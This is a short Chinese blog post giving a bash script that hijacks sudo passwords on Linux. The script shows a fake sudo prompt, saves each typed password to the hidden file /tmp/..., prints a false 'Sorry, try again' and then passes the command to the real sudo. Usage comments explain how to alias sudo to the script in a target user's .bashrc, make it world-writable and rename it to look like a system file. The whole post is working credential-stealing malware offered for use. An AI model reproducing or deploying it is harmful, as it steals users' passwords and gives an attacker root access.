标签:tmp ... 劫持 swhoami passwd sudo echo linux
简单linux-sudo密码劫持脚本
#!/bin/bash
swhoami=`whoami`
if [[ ! -f "/tmp/..." ]]; then
swhoami=`whoami`
read -s -p "[sudo] password for $swhoami: " passwd
echo "$passwd" >> /tmp/...
echo ""
sleep 1s
echo "Sorry, try again."
fi
read -s -p "[sudo] password for $swhoami: " passwd
echo "$passwd" >> /tmp/...
echo "$passwd"| /usr/bin/sudo -S whoami > /dev/null 2>&1 && echo "" && /usr/bin/sudo $*
# 使用方法:
# 可劫持用户输入密码 存放到/tmp/...里面
#vim /tmp/.sudo //将上面的内容写入到/tmp/.sudo
#vim /home/test/.bashrc //修改test用的bashrc文件
#alias sudo=/tmp/.sudo //将此内容写入到bashrc
#chmod 777 /tmp/.sudo //修改.sudo权限为777
# 建议将.sudo 名字修改为.XI1-unix 或.Test-unix 进行伪装
标签:tmp,
...,
劫持,
swhoami,
passwd,
sudo,
echo,
linux
From: https://www.cnblogs.com/startstart/p/16909516.html